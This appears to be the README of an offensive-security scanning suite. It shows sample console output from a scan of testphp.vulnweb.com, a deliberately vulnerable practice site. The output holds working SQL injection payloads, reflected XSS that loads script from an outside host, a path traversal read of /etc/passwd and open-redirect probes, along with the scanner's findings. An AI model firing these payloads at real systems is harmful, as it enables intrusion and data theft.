1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83
| . .-~\ / `-'.' `- : | / `._ | | .-. { \ | `-' `. . \ | / We exploit flaws, not people. ~-.`.\ \| .-~_ `.\-.\ .-~ \ `-'/~~ -.~ / .-~/|`-._ /~~-.~ -- ~ / | \ ~- . _\
A suite integrating open-source workflows tailored for offensive security. Author: 1337rokudenashi Current yublueflower version v0.0.3 (latest)
Testing started at 13:37:01 01-03-2025 🟢 Reconnaissance Phase: Aggressively gathering URLs... http://testphp.vulnweb.com/redir.php?r=https://getgophish.com/ http://testphp.vulnweb.com/AJAX/infoartist.php?id=1 AND UPDATEXML(3477,CONCAT(0x2e,0x7176716271,(SELECT (ELT(3477=3477,1))),0x716b786b71),6541) http://testphp.vulnweb.com/artists.php?artist=1 order by 4 http://testphp.vulnweb.com/product.php?pic=3) AND 4294=2769 AND (1005=1005 http://testphp.vulnweb.com/listproducts.php?cat=1 http://testphp.vulnweb.com/? http://testphp.vulnweb.com/showimage.php?file=13745325-cd3d-4961-b71d-d04727bb02b0 http://testphp.vulnweb.com/comment.php?aid=' UNION SELECT * FROM information_schema -- http://testphp.vulnweb.com/search.php?test=<USER_INPUT> http://testphp.vulnweb.com/Mod_Rewrite_Shop/rate.php?id=-1 OR 17-7=10CONFIRMED http://testphp.vulnweb.com/hpp/params.php?aaaa/= http://testphp.vulnweb.com/login.php?id=1 http://testphp.vulnweb.com/Mod_Rewrite_Shop/details.php?id=-1 OR 17-7=10 PROCEDURE ANALYSE(EXTRACTVALUE(6706,CONCAT(0x5c,0x7176627671,(SELECT (CASE WHEN (6706=6706) THEN 1 ELSE 0 END)),0x716a627a71)),1) http://testphp.vulnweb.com/hpp/?pp='"--></style></scRipt><scRipt src="//mv9e8mbvffulk1i0duvujvkdkktmkntnztbb8kejrja http://testphp.vulnweb.com/˓→artists.php?artist=0 http://testphp.vulnweb.com/secured/phpinfo.php?=PHPE9568F35-D428-11d2-A769-00AA001ACF42 http://testphp.vulnweb.com/pictures/credentials.txtA01http://testphp.vulnweb.com/product.php?pic=1 http://testphp.vulnweb.com/Mod_Rewrite_Shop/buy.php?id=- http://testphp.vulnweb.com/˓→listproducts.php?cat=FUZZ********************************************************* http://testphp.vulnweb.com/index.zipA01http://testphp.vulnweb.com/listproducts.php?artist=1A01 http://testphp.vulnweb.com/index.php?%id%=1 http://testphp.vulnweb.com/categories.php/listproducts.php?cat=' http://testphp.vulnweb.com/artist.php?artist=1 http://testphp.vulnweb.com/hpp/?pp=12 http://testphp.vulnweb.com/artists.php?artist=3 http://testphp.vulnweb.com/listproducts.php?cat=1 http://testphp.vulnweb.com/hpp/params.php?p=valid http://testphp.vulnweb.com/showimage.php?file=./pictures/3.jpg http://testphp.vulnweb.com/product.php?pic=6 🟢 Vulnerability Assessment Phase: Assessing vulnerabilities offensively, scanning as well as testing utilizing security flaw templates... [waf-detect:nginxgeneric] [http] [info] http://testphp.vulnweb.com/ [php-errors] [http] [info] http://testphp.vulnweb.com/ ["Warning: mysql_connect()"] [nginx-version] [http] [info] http://testphp.vulnweb.com/ ["nginx/1.19.0"] [php-detect] [http] [info] http://testphp.vulnweb.com/ ["5.6.40"] [open-redirect] [http] [medium] http://testphp.vulnweb.com/redir.php?r=https://oast.me [query:r] [GET] [sqli-error-based:mysql] [http] [critical] http://testphp.vulnweb.com/listproducts.php?cat=1%ef%80%a0' ["SQL syntax; check the manual that corresponds to your MySQL","check the manual that corresponds to your MySQL server version"] [query:cat] [GET] [sqli-error-based:mysql] [http] [critical] http://testphp.vulnweb.com/artists.php?artist=1+order+by+4' ["SQL syntax; check the manual that corresponds to your MySQL","check the manual that corresponds to your MySQL server version"] [query:artist] [GET] [sqli-error-based:mysql] [http] [critical] http://testphp.vulnweb.com/Mod_Rewrite_Shop/details.php?id=-1+OR+17-7=10+PROCEDURE+ANALYSE(EXTRACTVALUE(6706,CONCAT(0x5c,0x7176627671,(SELECT+(CASE+WHEN+(6706=6706)+THEN+1+ELSE+0+END)),0x716a627a71)),1)' ["SQL syntax; check the manual that corresponds to your MySQL","check the manual that corresponds to your MySQL server version"] [query:id] [GET] [sqli-error-based:mysql] [http] [critical] http://testphp.vulnweb.com/product.php?pic=3)+AND+4294=2769+AND+(1005=1005' ["SQL syntax; check the manual that corresponds to your MySQL","check the manual that corresponds to your MySQL server version"] [query:pic] [GET] [sqli-error-based:mysql] [http] [critical] http://testphp.vulnweb.com/AJAX/infoartist.php?id=1+AND+UPDATEXML(3477,CONCAT(0x2e,0x7176716271,(SELECT+(ELT(3477=3477,1))),0x716b786b71),6541)' ["SQL syntax; check the manual that corresponds to your MySQL","check the manual that corresponds to your MySQL server version"] [query:id] [GET] [sqli-error-based:mysql] [http] [critical] http://testphp.vulnweb.com/Mod_Rewrite_Shop/buy.php?id=-' ["SQL syntax; check the manual that corresponds to your MySQL","check the manual that corresponds to your MySQL server version"] [query:id] [GET] [sqli-error-based:mysql] [http] [critical] http://testphp.vulnweb.com/Mod_Rewrite_Shop/rate.php?id=-1+OR+17-7=10CONFIRMED' ["SQL syntax; check the manual that corresponds to your MySQL","check the manual that corresponds to your MySQL server version"] [query:id] [GET] [sqli-error-based:mysql] [http] [critical] http://testphp.vulnweb.com/search.php?test=<USER_INPUT>' ["SQL syntax; check the manual that corresponds to your MySQL","check the manual that corresponds to your MySQL server version"] [query:test] [GET] [open-redirect] [http] [medium] http://testphp.vulnweb.com/redir.php?r=https://oast.me [query:r] [GET] [reflected-xss] [http] [medium] http://testphp.vulnweb.com/hpp/?pp='"--></style></scRipt><scRipt+src="//mv9e8mbvffulk1i0duvujvkdkktmkntnztbb8kejrja'"><69347> [query:pp] [GET] [reflected-xss] [http] [medium] http://testphp.vulnweb.com/search.php?test=<USER_INPUT>'"><69347> [query:test] [GET] [reflected-xss] [http] [medium] http://testphp.vulnweb.com/product.php?pic=3)+AND+4294=2769+AND+(1005=1005'"><69347> [query:pic] [GET] [reflected-xss] [http] [medium] http://testphp.vulnweb.com/Mod_Rewrite_Shop/rate.php?id=-1+OR+17-7=10CONFIRMED'"><69347> [query:id] [GET] [reflected-xss] [http] [medium] http://testphp.vulnweb.com/artists.php?artist=1+order+by+4'"><69347> [query:artist] [GET] [reflected-xss] [http] [medium] http://testphp.vulnweb.com/Mod_Rewrite_Shop/buy.php?id=-'"><69347> [query:id] [GET] [reflected-xss] [http] [medium] http://testphp.vulnweb.com/listproducts.php?cat=1%ef%80%a0'"><69347> [query:cat] [GET] [sqli-error-based:mysql] [http] [critical] http://testphp.vulnweb.com/listproducts.php?cat=1' ["SQL syntax; check the manual that corresponds to your MySQL","check the manual that corresponds to your MySQL server version"] [query:cat] [GET] [sqli-error-based:mysql] [http] [critical] http://testphp.vulnweb.com/artists.php?artist=3' ["check the manual that corresponds to your MySQL server version","SQL syntax; check the manual that corresponds to your MySQL"] [query:artist] [GET] [sqli-error-based:mysql] [http] [critical] http://testphp.vulnweb.com/product.php?pic=6' ["SQL syntax; check the manual that corresponds to your MySQL","check the manual that corresponds to your MySQL server version"] [query:pic] [GET] [reflected-xss] [http] [medium] http://testphp.vulnweb.com/listproducts.php?cat=1'"><77225> [query:cat] [GET] [reflected-xss] [http] [medium] http://testphp.vulnweb.com/product.php?pic=6'"><77225> [query:pic] [GET] [reflected-xss] [http] [medium] http://testphp.vulnweb.com/hpp/params.php?p=valid'"><77225> [query:p] [GET] [linux-lfi-fuzz] [http] [high] http://testphp.vulnweb.com/showimage.php?file=../../etc/passwd [GET] [reflected-xss] [http] [medium] http://testphp.vulnweb.com/hpp/?pp=12'"><77225> [query:pp] [GET] [reflected-xss] [http] [medium] http://testphp.vulnweb.com/artists.php?artist=3'"><77225> [query:artist] [GET] 🟢 Reporting Phase: Results flawlessly generated... Results at /home/yublueflower/glow_yublueflower Testing finished at 13:44:01 01-03-2025 Use command glow yublueflower_20250301_133701 to see results.
|